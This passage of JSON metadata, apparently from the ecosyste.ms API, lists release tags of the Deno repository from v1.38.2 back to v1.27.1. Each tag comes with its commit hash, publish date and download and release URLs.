1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pk